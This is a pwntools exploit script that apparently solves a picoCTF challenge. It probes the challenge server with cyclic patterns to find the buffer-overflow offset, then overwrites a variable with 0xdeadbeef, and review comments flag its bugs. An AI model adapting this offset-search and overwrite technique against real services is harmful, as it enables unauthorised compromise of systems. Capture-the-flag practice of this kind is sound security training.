
#!/usr/bin/env python
from pwn import *
def get_conn():
    """Open a fresh tube to the challenge service.

    The local-process variant is kept as a comment so the same script can be
    pointed at a local copy of the binary when one is available.
    """
    # return process("./chall")
    host, port = "mars.picoctf.net", 31890
    return remote(host, port)
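def try_memory_offset(offset):
    """Send a cyclic pattern of ``offset`` bytes and return what the service echoes.

    A new connection is opened for every probe: the prompt ending in ``see?``
    is consumed, the pattern is sent as one line, and the text the service
    prints after ``== `` is returned as bytes with the trailing newline removed.

    Args:
        offset: length in bytes of the De Bruijn pattern to send
            (``cyclic(..., n=8)``, i.e. every 8-byte window is unique).

    Returns:
        The raw bytes printed after ``== `` (``b"0x0"`` when nothing changed).

    Raises:
        Whatever the tube raises when the service closes the connection or
        times out before answering; the caller catches that and treats the
        length as unusable.
    """
    pattern = cyclic(length=offset, n=8)
    conn = get_conn()
    try:
        conn.recvuntil(b"see?")
        conn.recvline()
        conn.sendline(pattern)
        conn.recvuntil(b"== ")
        result = conn.recvline(keepends=False)
    finally:
        # Close on every path: previously the tube was only closed after a
        # successful read, so each failed probe (and the caller retries many)
        # leaked a connection.
        conn.close()
    return result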
# --- search for the input length at which the echoed value changes ---
# Probe lengths grow as base + 2**exp. When a probe fails (the service drops
# the connection before answering) `base` is moved to the last length that
# worked and the exponent restarts from 0. Once the echoed value is no longer
# 0x0, lengths are tried one byte at a time until two consecutive probes echo
# the same value, and cyclic_find() maps that value back to its position in
# the pattern.
# NOTE(review): presumably the value printed after "== " is a variable that
# an overlong input overwrites — confirm against the challenge binary.
base = 0x100
exp = 0
p = log.progress("searching for variable offset")
while True:
    offset = base + 2**exp
    p.status(f"trying offset {offset}")
    try:
        result = try_memory_offset(offset)
    except:
        # NOTE(review): a bare except also swallows KeyboardInterrupt, so
        # Ctrl-C cannot stop this loop; `except Exception:` is the narrower
        # form.
        # NOTE(review): when exp == 0 this adds 2**-1 == 0.5, which turns
        # `base` (and every later offset) into a float.
        base = base + 2**(exp-1)
        exp = 0
        continue
    if result != b"0x0":
        # `next_result` starts as the int 0, so the first comparison against
        # the bytes in `result` is always unequal and the loop runs at least
        # once; it exits when two consecutive probes return identical bytes.
        next_result = 0
        i = 0
        while result != next_result:
            i += 1
            result = next_result
            next_result = try_memory_offset(offset+i)
        # `result` is hex text such as b"0x..."; int() accepts bytes, and
        # cyclic_find() gives the index of that 8-byte window in the pattern.
        offset = cyclic_find(int(result, 16), n=8)
        # unhex() turns the hex digits after "0x" into raw bytes for display.
        p.success(f"found result {unhex(result[2:])} at offset {offset}")
        break
    exp += 1
# --- final send: pad up to the located offset, then the 8-byte value ---
conn = get_conn()
conn.recvuntil(b"see?")
conn.recvline()
conn.sendline(b"a"*offset + p64(0xdeadbeef))
conn.interactive()